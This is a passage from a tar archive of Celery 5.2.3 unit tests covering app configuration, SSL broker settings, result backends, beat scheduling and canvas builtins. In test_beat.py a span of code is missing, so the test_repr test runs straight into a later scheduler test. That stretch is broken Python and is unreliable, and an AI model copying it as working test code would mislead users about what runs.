'foo://bar' assert app.conf.broker_use_ssl['ssl_certfile'] == \ '/path/to/client.crt' assert app.conf.broker_use_ssl['ssl_keyfile'] == \ '/path/to/client.key' assert app.conf.broker_use_ssl['ssl_ca_certs'] == \ '/path/to/ca.crt' assert app.conf.broker_use_ssl['ssl_cert_reqs'] == \ ssl.CERT_REQUIRED assert app.conf.redis_backend_use_ssl['ssl_certfile'] == \ '/path/to/client.crt' assert app.conf.redis_backend_use_ssl['ssl_keyfile'] == \ '/path/to/client.key' assert app.conf.redis_backend_use_ssl['ssl_ca_certs'] == \ '/path/to/ca.crt' assert app.conf.redis_backend_use_ssl['ssl_cert_reqs'] == \ ssl.CERT_REQUIRED def test_repr(self): assert repr(self.app) def test_custom_task_registry(self): with self.Celery(tasks=self.app.tasks) as app2: assert app2.tasks is self.app.tasks def test_include_argument(self): with self.Celery(include=('foo', 'bar.foo')) as app: assert app.conf.include, ('foo' == 'bar.foo') def test_set_as_current(self): current = _state._tls.current_app try: app = self.Celery(set_as_current=True) assert _state._tls.current_app is app finally: _state._tls.current_app = current def test_current_task(self): @self.app.task def foo(shared=False): pass _state._task_stack.push(foo) try: assert self.app.current_task.name == foo.name finally: _state._task_stack.pop() def test_task_not_shared(self): with patch('celery.app.base.connect_on_app_finalize') as sh: @self.app.task(shared=False) def foo(): pass sh.assert_not_called() def test_task_compat_with_filter(self): with self.Celery() as app: check = Mock() def filter(task): check(task) return task @app.task(filter=filter, shared=False) def foo(): pass check.assert_called_with(foo) def test_task_with_filter(self): with self.Celery() as app: check = Mock() def filter(task): check(task) return task assert not _appbase.USING_EXECV @app.task(filter=filter, shared=False) def foo(): pass check.assert_called_with(foo) def test_task_sets_main_name_MP_MAIN_FILE(self): from celery.utils import imports as _imports _imports.MP_MAIN_FILE = __file__ try: with self.Celery('xuzzy') as app: @app.task def foo(): pass assert foo.name == 'xuzzy.foo' finally: _imports.MP_MAIN_FILE = None def test_can_get_type_hints_for_tasks(self): import typing with self.Celery() as app: @app.task def foo(parameter: int) -> None: pass assert typing.get_type_hints(foo) == {'parameter': int, 'return': type(None)} def test_annotate_decorator(self): from celery.app.task import Task class adX(Task): def run(self, y, z, x): return y, z, x check = Mock() def deco(fun): def _inner(*args, **kwargs): check(*args, **kwargs) return fun(*args, **kwargs) return _inner self.app.conf.task_annotations = { adX.name: {'@__call__': deco} } adX.bind(self.app) assert adX.app is self.app i = adX() i(2, 4, x=3) check.assert_called_with(i, 2, 4, x=3) i.annotate() i.annotate() def test_apply_async_adds_children(self): from celery._state import _task_stack @self.app.task(bind=True, shared=False) def a3cX1(self): pass @self.app.task(bind=True, shared=False) def a3cX2(self): pass _task_stack.push(a3cX1) try: a3cX1.push_request(called_directly=False) try: res = a3cX2.apply_async(add_to_parent=True) assert res in a3cX1.request.children finally: a3cX1.pop_request() finally: _task_stack.pop() def test_pickle_app(self): changes = {'THE_FOO_BAR': 'bars', 'THE_MII_MAR': 'jars'} self.app.conf.update(changes) saved = pickle.dumps(self.app) assert len(saved) < 2048 restored = pickle.loads(saved) for key, value in changes.items(): assert restored.conf[key] == value @patch('celery.bin.celery.celery') def test_worker_main(self, mocked_celery): self.app.worker_main(argv=['worker', '--help']) mocked_celery.main.assert_called_with( args=['worker', '--help'], standalone_mode=False) def test_config_from_envvar(self): os.environ['CELERYTEST_CONFIG_OBJECT'] = 't.unit.app.test_app' self.app.config_from_envvar('CELERYTEST_CONFIG_OBJECT') assert self.app.conf.THIS_IS_A_KEY == 'this is a value' def assert_config2(self): assert self.app.conf.LEAVE_FOR_WORK assert self.app.conf.MOMENT_TO_STOP assert self.app.conf.CALL_ME_BACK == 123456789 assert not self.app.conf.WANT_ME_TO assert self.app.conf.UNDERSTAND_ME def test_config_from_object__lazy(self): conf = ObjectConfig2() self.app.config_from_object(conf) assert self.app.loader._conf is unconfigured assert self.app._config_source is conf self.assert_config2() def test_config_from_object__force(self): self.app.config_from_object(ObjectConfig2(), force=True) assert self.app.loader._conf self.assert_config2() def test_config_from_object__compat(self): class Config: CELERY_ALWAYS_EAGER = 44 CELERY_DEFAULT_DELIVERY_MODE = 30 CELERY_TASK_PUBLISH_RETRY = False self.app.config_from_object(Config) assert self.app.conf.task_always_eager == 44 assert self.app.conf.CELERY_ALWAYS_EAGER == 44 assert not self.app.conf.task_publish_retry assert self.app.conf.task_default_routing_key == 'testcelery' def test_config_from_object__supports_old_names(self): class Config: task_always_eager = 45 task_default_delivery_mode = 301 self.app.config_from_object(Config()) assert self.app.conf.CELERY_ALWAYS_EAGER == 45 assert self.app.conf.task_always_eager == 45 assert self.app.conf.CELERY_DEFAULT_DELIVERY_MODE == 301 assert self.app.conf.task_default_delivery_mode == 301 assert self.app.conf.task_default_routing_key == 'testcelery' def test_config_from_object__namespace_uppercase(self): class Config: CELERY_TASK_ALWAYS_EAGER = 44 CELERY_TASK_DEFAULT_DELIVERY_MODE = 301 self.app.config_from_object(Config(), namespace='CELERY') assert self.app.conf.task_always_eager == 44 def test_config_from_object__namespace_lowercase(self): class Config: celery_task_always_eager = 44 celery_task_default_delivery_mode = 301 self.app.config_from_object(Config(), namespace='celery') assert self.app.conf.task_always_eager == 44 def test_config_from_object__mixing_new_and_old(self): class Config: task_always_eager = 44 worker_agent = 'foo:Agent' worker_consumer = 'foo:Consumer' beat_schedule = '/foo/schedule' CELERY_DEFAULT_DELIVERY_MODE = 301 with pytest.raises(ImproperlyConfigured) as exc: self.app.config_from_object(Config(), force=True) assert exc.args[0].startswith('CELERY_DEFAULT_DELIVERY_MODE') assert 'task_default_delivery_mode' in exc.args[0] def test_config_from_object__mixing_old_and_new(self): class Config: CELERY_ALWAYS_EAGER = 46 CELERYD_AGENT = 'foo:Agent' CELERYD_CONSUMER = 'foo:Consumer' CELERYBEAT_SCHEDULE = '/foo/schedule' task_default_delivery_mode = 301 with pytest.raises(ImproperlyConfigured) as exc: self.app.config_from_object(Config(), force=True) assert exc.args[0].startswith('task_default_delivery_mode') assert 'CELERY_DEFAULT_DELIVERY_MODE' in exc.args[0] def test_config_from_cmdline(self): cmdline = ['task_always_eager=no', 'result_backend=/dev/null', 'worker_prefetch_multiplier=368', '.foobarstring=(string)300', '.foobarint=(int)300', 'database_engine_options=(dict){"foo": "bar"}'] self.app.config_from_cmdline(cmdline, namespace='worker') assert not self.app.conf.task_always_eager assert self.app.conf.result_backend == '/dev/null' assert self.app.conf.worker_prefetch_multiplier == 368 assert self.app.conf.worker_foobarstring == '300' assert self.app.conf.worker_foobarint == 300 assert self.app.conf.database_engine_options == {'foo': 'bar'} def test_setting__broker_transport_options(self): _args = {'foo': 'bar', 'spam': 'baz'} self.app.config_from_object(Bunch()) assert self.app.conf.broker_transport_options == \ {'polling_interval': 0.1} self.app.config_from_object(Bunch(broker_transport_options=_args)) assert self.app.conf.broker_transport_options == _args def test_Windows_log_color_disabled(self): self.app.IS_WINDOWS = True assert not self.app.log.supports_color(True) def test_WorkController(self): x = self.app.WorkController assert x.app is self.app def test_Worker(self): x = self.app.Worker assert x.app is self.app @pytest.mark.usefixtures('depends_on_current_app') def test_AsyncResult(self): x = self.app.AsyncResult('1') assert x.app is self.app r = loads(dumps(x)) # not set as current, so ends up as default app after reduce assert r.app is current_app._get_current_object() def test_get_active_apps(self): assert list(_state._get_active_apps()) app1 = self.Celery() appid = id(app1) assert app1 in _state._get_active_apps() app1.close() del(app1) gc.collect() # weakref removed from list when app goes out of scope. with pytest.raises(StopIteration): next(app for app in _state._get_active_apps() if id(app) == appid) def test_config_from_envvar_more(self, key='CELERY_HARNESS_CFG1'): assert not self.app.config_from_envvar( 'HDSAJIHWIQHEWQU', force=True, silent=True) with pytest.raises(ImproperlyConfigured): self.app.config_from_envvar( 'HDSAJIHWIQHEWQU', force=True, silent=False, ) os.environ[key] = __name__ + '.object_config' assert self.app.config_from_envvar(key, force=True) assert self.app.conf['FOO'] == 1 assert self.app.conf['BAR'] == 2 os.environ[key] = 'unknown_asdwqe.asdwqewqe' with pytest.raises(ImportError): self.app.config_from_envvar(key, silent=False) assert not self.app.config_from_envvar(key, force=True, silent=True) os.environ[key] = __name__ + '.dict_config' assert self.app.config_from_envvar(key, force=True) assert self.app.conf['FOO'] == 10 assert self.app.conf['BAR'] == 20 @patch('celery.bin.celery.celery') def test_start(self, mocked_celery): self.app.start() mocked_celery.main.assert_called() @pytest.mark.parametrize('url,expected_fields', [ ('pyamqp://', { 'hostname': 'localhost', 'userid': 'guest', 'password': 'guest', 'virtual_host': '/', }), ('pyamqp://:1978/foo', { 'port': 1978, 'virtual_host': 'foo', }), ('pyamqp:////value', { 'virtual_host': '/value', }) ]) def test_amqp_get_broker_info(self, url, expected_fields): info = self.app.connection(url).info() for key, expected_value in expected_fields.items(): assert info[key] == expected_value def test_amqp_failover_strategy_selection(self): # Test passing in a string and make sure the string # gets there untouched self.app.conf.broker_failover_strategy = 'foo-bar' assert self.app.connection('amqp:////value') \ .failover_strategy == 'foo-bar' # Try passing in None self.app.conf.broker_failover_strategy = None assert self.app.connection('amqp:////value') \ .failover_strategy == itertools.cycle # Test passing in a method def my_failover_strategy(it): yield True self.app.conf.broker_failover_strategy = my_failover_strategy assert self.app.connection('amqp:////value') \ .failover_strategy == my_failover_strategy def test_after_fork(self): self.app._pool = Mock() self.app.on_after_fork = Mock(name='on_after_fork') self.app._after_fork() assert self.app._pool is None self.app.on_after_fork.send.assert_called_with(sender=self.app) self.app._after_fork() def test_global_after_fork(self): self.app._after_fork = Mock(name='_after_fork') _appbase._after_fork_cleanup_app(self.app) self.app._after_fork.assert_called_with() @patch('celery.app.base.logger') def test_after_fork_cleanup_app__raises(self, logger): self.app._after_fork = Mock(name='_after_fork') exc = self.app._after_fork.side_effect = KeyError() _appbase._after_fork_cleanup_app(self.app) logger.info.assert_called_with( 'after forker raised exception: %r', exc, exc_info=1) def test_ensure_after_fork__no_multiprocessing(self): prev, _appbase.register_after_fork = ( _appbase.register_after_fork, None) try: self.app._after_fork_registered = False self.app._ensure_after_fork() assert self.app._after_fork_registered finally: _appbase.register_after_fork = prev def test_canvas(self): assert self.app._canvas.Signature def test_signature(self): sig = self.app.signature('foo', (1, 2)) assert sig.app is self.app def test_timezone__none_set(self): self.app.conf.timezone = None self.app.conf.enable_utc = True assert self.app.timezone == timezone.utc del self.app.timezone self.app.conf.enable_utc = False assert self.app.timezone == timezone.local def test_uses_utc_timezone(self): self.app.conf.timezone = None self.app.conf.enable_utc = True assert self.app.uses_utc_timezone() is True self.app.conf.enable_utc = False del self.app.timezone assert self.app.uses_utc_timezone() is False self.app.conf.timezone = 'US/Eastern' del self.app.timezone assert self.app.uses_utc_timezone() is False self.app.conf.timezone = 'UTC' del self.app.timezone assert self.app.uses_utc_timezone() is True def test_compat_on_configure(self): _on_configure = Mock(name='on_configure') class CompatApp(Celery): def on_configure(self, *args, **kwargs): # on pypy3 if named on_configure the class function # will be called, instead of the mock defined above, # so we add the underscore. _on_configure(*args, **kwargs) with CompatApp(set_as_current=False) as app: app.loader = Mock() app.loader.conf = {} app._load_config() _on_configure.assert_called_with() def test_add_periodic_task(self): @self.app.task def add(x, y): pass assert not self.app.configured self.app.add_periodic_task( 10, self.app.signature('add', (2, 2)), name='add1', expires=3, ) assert self.app._pending_periodic_tasks assert not self.app.configured sig2 = add.s(4, 4) assert self.app.configured self.app.add_periodic_task(20, sig2, name='add2', expires=4) assert 'add1' in self.app.conf.beat_schedule assert 'add2' in self.app.conf.beat_schedule @pytest.mark.masked_modules('multiprocessing.util') def test_pool_no_multiprocessing(self, mask_modules): pool = self.app.pool assert pool is self.app._pool def test_bugreport(self): assert self.app.bugreport() def test_send_task__connection_provided(self): connection = Mock(name='connection') router = Mock(name='router') router.route.return_value = {} self.app.amqp = Mock(name='amqp') self.app.amqp.Producer.attach_mock(ContextMock(), 'return_value') self.app.send_task('foo', (1, 2), connection=connection, router=router) self.app.amqp.Producer.assert_called_with( connection, auto_declare=False) self.app.amqp.send_task_message.assert_called_with( self.app.amqp.Producer(), 'foo', self.app.amqp.create_task_message()) def test_send_task_sent_event(self): class Dispatcher: sent = [] def publish(self, type, fields, *args, **kwargs): self.sent.append((type, fields)) conn = self.app.connection() chan = conn.channel() try: for e in ('foo_exchange', 'moo_exchange', 'bar_exchange'): chan.exchange_declare(e, 'direct', durable=True) chan.queue_declare(e, durable=True) chan.queue_bind(e, e, e) finally: chan.close() assert conn.transport_cls == 'memory' message = self.app.amqp.create_task_message( 'id', 'footask', (), {}, create_sent_event=True, ) prod = self.app.amqp.Producer(conn) dispatcher = Dispatcher() self.app.amqp.send_task_message( prod, 'footask', message, exchange='moo_exchange', routing_key='moo_exchange', event_dispatcher=dispatcher, ) assert dispatcher.sent assert dispatcher.sent[0][0] == 'task-sent' self.app.amqp.send_task_message( prod, 'footask', message, event_dispatcher=dispatcher, exchange='bar_exchange', routing_key='bar_exchange', ) def test_select_queues(self): self.app.amqp = Mock(name='amqp') self.app.select_queues({'foo', 'bar'}) self.app.amqp.queues.select.assert_called_with({'foo', 'bar'}) def test_Beat(self): from celery.apps.beat import Beat beat = self.app.Beat() assert isinstance(beat, Beat) def test_registry_cls(self): class TaskRegistry(self.app.registry_cls): pass class CustomCelery(type(self.app)): registry_cls = TaskRegistry app = CustomCelery(set_as_current=False) assert isinstance(app.tasks, TaskRegistry) def test_oid(self): # Test that oid is global value. oid1 = self.app.oid oid2 = self.app.oid uuid.UUID(oid1) uuid.UUID(oid2) assert oid1 == oid2 def test_global_oid(self): # Test that oid is global value also within threads main_oid = self.app.oid uuid.UUID(main_oid) from concurrent.futures import ThreadPoolExecutor with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(lambda: self.app.oid) thread_oid = future.result() uuid.UUID(thread_oid) assert main_oid == thread_oid def test_thread_oid(self): # Test that thread_oid is global value in single thread. oid1 = self.app.thread_oid oid2 = self.app.thread_oid uuid.UUID(oid1) uuid.UUID(oid2) assert oid1 == oid2 def test_backend(self): # Test that app.bakend returns the same backend in single thread backend1 = self.app.backend backend2 = self.app.backend assert isinstance(backend1, Backend) assert isinstance(backend2, Backend) assert backend1 is backend2 def test_thread_backend(self): # Test that app.bakend returns the new backend for each thread main_backend = self.app.backend from concurrent.futures import ThreadPoolExecutor with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(lambda: self.app.backend) thread_backend = future.result() assert isinstance(main_backend, Backend) assert isinstance(thread_backend, Backend) assert main_backend is not thread_backend def test_thread_oid_is_local(self): # Test that thread_oid is local to thread. main_oid = self.app.thread_oid uuid.UUID(main_oid) from concurrent.futures import ThreadPoolExecutor with ThreadPoolExecutor(max_workers=1) as executor: future = executor.submit(lambda: self.app.thread_oid) thread_oid = future.result() uuid.UUID(thread_oid) assert main_oid != thread_oid class test_defaults: def test_strtobool(self): for s in ('false', 'no', '0'): assert not defaults.strtobool(s) for s in ('true', 'yes', '1'): assert defaults.strtobool(s) with pytest.raises(TypeError): defaults.strtobool('unsure') class test_debugging_utils: def test_enable_disable_trace(self): try: _app.enable_trace() assert _state.app_or_default == _state._app_or_default_trace _app.disable_trace() assert _state.app_or_default == _state._app_or_default finally: _app.disable_trace() class test_pyimplementation: def test_platform_python_implementation(self): with conftest.platform_pyimp(lambda: 'Xython'): assert pyimplementation() == 'Xython' def test_platform_jython(self): with conftest.platform_pyimp(): with conftest.sys_platform('java 1.6.51'): assert 'Jython' in pyimplementation() def test_platform_pypy(self): with conftest.platform_pyimp(): with conftest.sys_platform('darwin'): with conftest.pypy_version((1, 4, 3)): assert 'PyPy' in pyimplementation() with conftest.pypy_version((1, 4, 3, 'a4')): assert 'PyPy' in pyimplementation() def test_platform_fallback(self): with conftest.platform_pyimp(): with conftest.sys_platform('darwin'): with conftest.pypy_version(): assert 'CPython' == pyimplementation() class test_shared_task: def test_registers_to_all_apps(self): with self.Celery('xproj', set_as_current=True) as xproj: xproj.finalize() @shared_task def foo(): return 42 @shared_task() def bar(): return 84 assert foo.app is xproj assert bar.app is xproj assert foo._get_current_object() with self.Celery('yproj', set_as_current=True) as yproj: assert foo.app is yproj assert bar.app is yproj @shared_task() def baz(): return 168 assert baz.app is yproj ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_backends.py0000664000175000017500000001067600000000000020074 0ustar00asifasif00000000000000import threading from contextlib import contextmanager from unittest.mock import patch import pytest import celery.contrib.testing.worker as contrib_embed_worker from celery.app import backends from celery.backends.cache import CacheBackend from celery.exceptions import ImproperlyConfigured from celery.utils.nodenames import anon_nodename class CachedBackendWithTreadTrucking(CacheBackend): test_instance_count = 0 test_call_stats = {} def _track_attribute_access(self, method_name): cls = type(self) instance_no = getattr(self, '_instance_no', None) if instance_no is None: instance_no = self._instance_no = cls.test_instance_count cls.test_instance_count += 1 cls.test_call_stats[instance_no] = [] cls.test_call_stats[instance_no].append({ 'thread_id': threading.get_ident(), 'method_name': method_name }) def __getattribute__(self, name): if name == '_instance_no' or name == '_track_attribute_access': return super().__getattribute__(name) if name.startswith('__') and name != '__init__': return super().__getattribute__(name) self._track_attribute_access(name) return super().__getattribute__(name) @contextmanager def embed_worker(app, concurrency=1, pool='threading', **kwargs): """ Helper embedded worker for testing. It's based on a :func:`celery.contrib.testing.worker.start_worker`, but doesn't modifies logging settings and additionally shutdown worker pool. """ # prepare application for worker app.finalize() app.set_current() worker = contrib_embed_worker.TestWorkController( app=app, concurrency=concurrency, hostname=anon_nodename(), pool=pool, # not allowed to override TestWorkController.on_consumer_ready ready_callback=None, without_heartbeat=kwargs.pop("without_heartbeat", True), without_mingle=True, without_gossip=True, **kwargs ) t = threading.Thread(target=worker.start, daemon=True) t.start() worker.ensure_started() yield worker worker.stop() t.join(10.0) if t.is_alive(): raise RuntimeError( "Worker thread failed to exit within the allocated timeout. " "Consider raising `shutdown_timeout` if your tasks take longer " "to execute." ) class test_backends: @pytest.mark.parametrize('url,expect_cls', [ ('cache+memory://', CacheBackend), ]) def test_get_backend_aliases(self, url, expect_cls, app): backend, url = backends.by_url(url, app.loader) assert isinstance(backend(app=app, url=url), expect_cls) def test_unknown_backend(self, app): with pytest.raises(ImportError): backends.by_name('fasodaopjeqijwqe', app.loader) def test_backend_by_url(self, app, url='redis://localhost/1'): from celery.backends.redis import RedisBackend backend, url_ = backends.by_url(url, app.loader) assert backend is RedisBackend assert url_ == url def test_sym_raises_ValuError(self, app): with patch('celery.app.backends.symbol_by_name') as sbn: sbn.side_effect = ValueError() with pytest.raises(ImproperlyConfigured): backends.by_name('xxx.xxx:foo', app.loader) def test_backend_can_not_be_module(self, app): with pytest.raises(ImproperlyConfigured): backends.by_name(pytest, app.loader) @pytest.mark.celery( result_backend=f'{CachedBackendWithTreadTrucking.__module__}.' f'{CachedBackendWithTreadTrucking.__qualname__}' f'+memory://') def test_backend_thread_safety(self): @self.app.task def dummy_add_task(x, y): return x + y with embed_worker(app=self.app, pool='threads'): result = dummy_add_task.delay(6, 9) assert result.get(timeout=10) == 15 call_stats = CachedBackendWithTreadTrucking.test_call_stats # check that backend instance is used without same thread for backend_call_stats in call_stats.values(): thread_ids = set() for call_stat in backend_call_stats: thread_ids.add(call_stat['thread_id']) assert len(thread_ids) <= 1, \ "The same celery backend instance is used by multiple threads" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_beat.py0000664000175000017500000006741600000000000017241 0ustar00asifasif00000000000000import errno from datetime import datetime, timedelta from pickle import dumps, loads from unittest.mock import Mock, call, patch import pytest import pytz from celery import __version__, beat, uuid from celery.beat import BeatLazyFunc, event_t from celery.schedules import crontab, schedule from celery.utils.objects import Bunch class MockShelve(dict): closed = False synced = False def close(self): self.closed = True def sync(self): self.synced = True class MockService: started = False stopped = False def __init__(self, *args, **kwargs): pass def start(self, **kwargs): self.started = True def stop(self, **kwargs): self.stopped = True class test_BeatLazyFunc: def test_beat_lazy_func(self): def add(a, b): return a + b result = BeatLazyFunc(add, 1, 2) assert add(1, 2) == result() assert add(1, 2) == result.delay() class test_ScheduleEntry: Entry = beat.ScheduleEntry def create_entry(self, **kwargs): entry = { 'name': 'celery.unittest.add', 'schedule': timedelta(seconds=10), 'args': (2, 2), 'options': {'routing_key': 'cpu'}, 'app': self.app, } return self.Entry(**dict(entry, **kwargs)) def test_next(self): entry = self.create_entry(schedule=10) assert entry.last_run_at assert isinstance(entry.last_run_at, datetime) assert entry.total_run_count == 0 next_run_at = entry.last_run_at + timedelta(seconds=10) next_entry = entry.next(next_run_at) assert next_entry.last_run_at >= next_run_at assert next_entry.total_run_count == 1 def test_is_due(self): entry = self.create_entry(schedule=timedelta(seconds=10)) assert entry.app is self.app assert entry.schedule.app is self.app due1, next_time_to_run1 = entry.is_due() assert not due1 assert next_time_to_run1 > 9 next_run_at = entry.last_run_at - timedelta(seconds=10) next_entry = entry.next(next_run_at) due2, next_time_to_run2 = next_entry.is_due() assert due2 assert next_time_to_run2 > 9 def test_repr(self): entry = self.create_entry() assert ' 1: return s.sh raise OSError() opens.side_effect = effect s.setup_schedule() s._remove_db.assert_called_with() s._store = {'__version__': 1} s.setup_schedule() s._store.clear = Mock() op = s.persistence.open = Mock() op.return_value = s._store s._store['tz'] = 'FUNKY' s.setup_schedule() op.assert_called_with(s.schedule_filename, writeback=True) s._store.clear.assert_called_with() s._store['utc_enabled'] = False s._store.clear = Mock() s.setup_schedule() s._store.clear.assert_called_with() def test_get_schedule(self): s = create_persistent_scheduler()[0]( schedule_filename='schedule', app=self.app, ) s._store = {'entries': {}} s.schedule = {'foo': 'bar'} assert s.schedule == {'foo': 'bar'} assert s._store['entries'] == s.schedule def test_run_all_due_tasks_after_restart(self): scheduler_class, shelve = create_persistent_scheduler_w_call_logging() shelve['tz'] = 'UTC' shelve['utc_enabled'] = True shelve['__version__'] = __version__ cur_seconds = 20 def now_func(): return datetime(2018, 1, 1, 1, 11, cur_seconds) app_schedule = { 'first_missed': {'schedule': crontab( minute='*/10', nowfun=now_func), 'task': 'first_missed'}, 'second_missed': {'schedule': crontab( minute='*/1', nowfun=now_func), 'task': 'second_missed'}, 'non_missed': {'schedule': crontab( minute='*/13', nowfun=now_func), 'task': 'non_missed'} } shelve['entries'] = { 'first_missed': beat.ScheduleEntry( 'first_missed', 'first_missed', last_run_at=now_func() - timedelta(minutes=2), total_run_count=10, schedule=app_schedule['first_missed']['schedule']), 'second_missed': beat.ScheduleEntry( 'second_missed', 'second_missed', last_run_at=now_func() - timedelta(minutes=2), total_run_count=10, schedule=app_schedule['second_missed']['schedule']), 'non_missed': beat.ScheduleEntry( 'non_missed', 'non_missed', last_run_at=now_func() - timedelta(minutes=2), total_run_count=10, schedule=app_schedule['non_missed']['schedule']), } self.app.conf.beat_schedule = app_schedule scheduler = scheduler_class(self.app) max_iter_number = 5 for i in range(max_iter_number): delay = scheduler.tick() if delay > 0: break assert {'first_missed', 'second_missed'} == { item['task'] for item in scheduler.sent} # ensure next call on the beginning of next min assert abs(60 - cur_seconds - delay) < 1 class test_Service: def get_service(self): Scheduler, mock_shelve = create_persistent_scheduler() return beat.Service(app=self.app, scheduler_cls=Scheduler), mock_shelve def test_pickleable(self): s = beat.Service(app=self.app, scheduler_cls=Mock) assert loads(dumps(s)) def test_start(self): s, sh = self.get_service() schedule = s.scheduler.schedule assert isinstance(schedule, dict) assert isinstance(s.scheduler, beat.Scheduler) scheduled = list(schedule.keys()) for task_name in sh['entries'].keys(): assert task_name in scheduled s.sync() assert sh.closed assert sh.synced assert s._is_stopped.is_set() s.sync() s.stop(wait=False) assert s._is_shutdown.is_set() s.stop(wait=True) assert s._is_shutdown.is_set() p = s.scheduler._store s.scheduler._store = None try: s.scheduler.sync() finally: s.scheduler._store = p def test_start_embedded_process(self): s, sh = self.get_service() s._is_shutdown.set() s.start(embedded_process=True) def test_start_thread(self): s, sh = self.get_service() s._is_shutdown.set() s.start(embedded_process=False) def test_start_tick_raises_exit_error(self): s, sh = self.get_service() s.scheduler.tick_raises_exit = True s.start() assert s._is_shutdown.is_set() def test_start_manages_one_tick_before_shutdown(self): s, sh = self.get_service() s.scheduler.shutdown_service = s s.start() assert s._is_shutdown.is_set() class test_EmbeddedService: def xxx_start_stop_process(self): pytest.importorskip('_multiprocessing') from billiard.process import Process s = beat.EmbeddedService(self.app) assert isinstance(s, Process) assert isinstance(s.service, beat.Service) s.service = MockService() class _Popen: terminated = False def terminate(self): self.terminated = True with patch('celery.platforms.close_open_fds'): s.run() assert s.service.started s._popen = _Popen() s.stop() assert s.service.stopped assert s._popen.terminated def test_start_stop_threaded(self): s = beat.EmbeddedService(self.app, thread=True) from threading import Thread assert isinstance(s, Thread) assert isinstance(s.service, beat.Service) s.service = MockService() s.run() assert s.service.started s.stop() assert s.service.stopped class test_schedule: def test_maybe_make_aware(self): x = schedule(10, app=self.app) x.utc_enabled = True d = x.maybe_make_aware(datetime.utcnow()) assert d.tzinfo x.utc_enabled = False d2 = x.maybe_make_aware(datetime.utcnow()) assert d2.tzinfo def test_to_local(self): x = schedule(10, app=self.app) x.utc_enabled = True d = x.to_local(datetime.utcnow()) assert d.tzinfo is None x.utc_enabled = False d = x.to_local(datetime.utcnow()) assert d.tzinfo ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/app/test_builtins.py0000664000175000017500000001254000000000000020143 0ustar00asifasif00000000000000from unittest.mock import Mock, patch import pytest from celery import chord, group from celery.app import builtins from celery.contrib.testing.mocks import ContextMock from celery.utils.functional import pass1 class BuiltinsCase: def setup(self): @self.app.task(shared=False) def xsum(x): return sum(x) self.xsum = xsum @self.app.task(shared=False) def add(x, y): return x + y self.add = add class test_backend_cleanup(BuiltinsCase): def test_run(self): self.app.backend.cleanup = Mock() self.app.backend.cleanup.__name__ = 'cleanup' cleanup_task = builtins.add_backend_cleanup_task(self.app) cleanup_task() self.app.backend.cleanup.assert_called() class test_accumulate(BuiltinsCase): def setup(self): self.accumulate = self.app.tasks['celery.accumulate'] def test_with_index(self): assert self.accumulate(1, 2, 3, 4, index=0) == 1 def test_no_index(self): assert self.accumulate(1, 2, 3, 4), (1, 2, 3 == 4) class test_map(BuiltinsCase): def test_run(self): @self.app.task(shared=False) def map_mul(x): return x[0] * x[1] res = self.app.tasks['celery.map']( map_mul, [(2, 2), (4, 4), (8, 8)], ) assert res, [4, 16 == 64] class test_starmap(BuiltinsCase): def test_run(self): @self.app.task(shared=False) def smap_mul(x, y): return x * y res = self.app.tasks['celery.starmap']( smap_mul, [(2, 2), (4, 4), (8, 8)], ) assert res, [4, 16 == 64] class test_chunks(BuiltinsCase): @patch('celery.canvas.chunks.apply_chunks') def test_run(self, apply_chunks): @self.app.task(shared=False) def chunks_mul(l): return l self.app.tasks['celery.chunks']( chunks_mul, [(2, 2), (4, 4), (8, 8)], 1, ) apply_chunks.assert_called() class test_group(BuiltinsCase): def setup(self): self.maybe_signature = self.patching('celery.canvas.maybe_signature') self.maybe_signature.side_effect = pass1 self.app.producer_or_acquire = Mock() self.app.producer_or_acquire.attach_mock( ContextMock(serializer='json'), 'return_value' ) self.app.conf.task_always_eager = True self.task = builtins.add_group_task(self.app) super().setup() def test_apply_async_eager(self): self.task.apply = Mock(name='apply') self.task.apply_async((1, 2, 3, 4, 5)) self.task.apply.assert_called() def mock_group(self, *tasks): g = group(*tasks, app=self.app) result = g.freeze() for task in g.tasks: task.clone = Mock(name='clone') task.clone.attach_mock(Mock(), 'apply_async') return g, result @patch('celery.app.base.Celery.current_worker_task') def test_task(self, current_worker_task): g, result = self.mock_group(self.add.s(2), self.add.s(4)) self.task(g.tasks, result, result.id, (2,)).results g.tasks[0].clone().apply_async.assert_called_with( group_id=result.id, producer=self.app.producer_or_acquire(), add_to_parent=False, ) current_worker_task.add_trail.assert_called_with(result) @patch('celery.app.base.Celery.current_worker_task') def test_task__disable_add_to_parent(self, current_worker_task): g, result = self.mock_group(self.add.s(2, 2), self.add.s(4, 4)) self.task(g.tasks, result, result.id, None, add_to_parent=False) current_worker_task.add_trail.assert_not_called() class test_chain(BuiltinsCase): def setup(self): super().setup() self.task = builtins.add_chain_task(self.app) def test_not_implemented(self): with pytest.raises(NotImplementedError): self.task() class test_chord(BuiltinsCase): def setup(self): self.task = builtins.add_chord_task(self.app) super().setup() def test_apply_async(self): x = chord([self.add.s(i, i) for i in range(10)], body=self.xsum.s()) r = x.apply_async() assert r assert r.parent def test_run_header_not_group(self): self.task([self.add.s(i, i) for i in range(10)], self.xsum.s()) def test_forward_options(self): body = self.xsum.s() x = chord([self.add.s(i, i) for i in range(10)], body=body) x.run = Mock(name='chord.run(x)') x.apply_async(group_id='some_group_id') x.run.assert_called() resbody = x.run.call_args[0][1] assert resbody.options['group_id'] == 'some_group_id' x2 = chord([self.add.s(i, i) for i in range(10)], body=body) x2.run = Mock(name='chord.run(x2)') x2.apply_async(chord='some_chord_id') x2.run.assert_called() resbody = x2.run.call_args[0][1] assert resbody.options['chord'] == 'some_chord_id' def test_apply_eager(self): self.app.conf.task_always_eager = True x = chord([self.add.s(i, i) for i in range(10)], body=self.xsum.s()) r = x.apply_async() assert r.get() == 90 def test_apply_eager_with_arguments(self): self.app.conf.task_always_eager = True x = chord([self.add.s(i) for i in range(10)], body=self.xsum.s()) r = x.apply_async([1]) assert r.get() == 55 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_celery.py0000664000175000017500000000054400000000000017576 0ustar00asifasif00000000000000import pytest import celery def test_version(): assert celery.VERSION assert len(celery.VERSION) >= 3 celery.VERSION = (0, 3, 0) assert celery.__version__.count('.') >= 